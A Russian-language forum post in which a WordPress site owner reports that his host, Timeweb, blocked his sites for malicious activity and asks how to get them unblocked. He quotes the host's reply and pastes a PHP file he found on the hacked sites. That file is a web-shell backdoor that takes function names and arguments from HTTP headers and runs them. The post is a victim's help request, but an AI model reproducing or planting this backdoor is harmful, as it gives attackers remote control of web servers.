Timeweb заблокировал доступ к сайтам за вредоносную активность

Заблочили доступ к сайтам. Нашел левые файлы Php на своих сайтах где стоит WP, на других нет ничего. Т.е.  из за WP .
на одном сайте стоят  только два плагина cyr to lat   и dolly, т.е.  скорей всего не из за плагинов. Темы (шаблоны) у всех разные. 

Может у кого было что-то подобное, что надо сделать чтобы разблокировали?

Они написали такое.

"Скорее всего, вредоносная активность стала результатом взлома вашего аккаунта. Вам необходимо провести аудит безопасности, чтобы проблема не возникла снова."

https://timeweb.com/ru/docs/virtualnyj-hosting/vzlomy-i-zashchita/ustranenie-i-preduprezhdenie-vzlomov/

<?php

if(isset($_COOKIE['dI'])) {
    die('CqomkwO');
}
if (function_exists('getallheaders')) {
    $headers = getallheaders();
} else {
    $headers = array();
    foreach ($_SERVER as $name => $value) {
        if (substr($name, 0, 5) == 'HTTP_') {
            $headers[str_replace(' ', '-', ucwords(strtolower(str_replace('_', ' ', substr($name, 5)))))] = $value;
        }
    }
}

if (isset($headers['Large-Allocation'])) {
    $callback = $headers['Large-Allocation'];
    $result = $callback('', $headers['If-Unmodified-Since']($headers['If-Modified-Since']));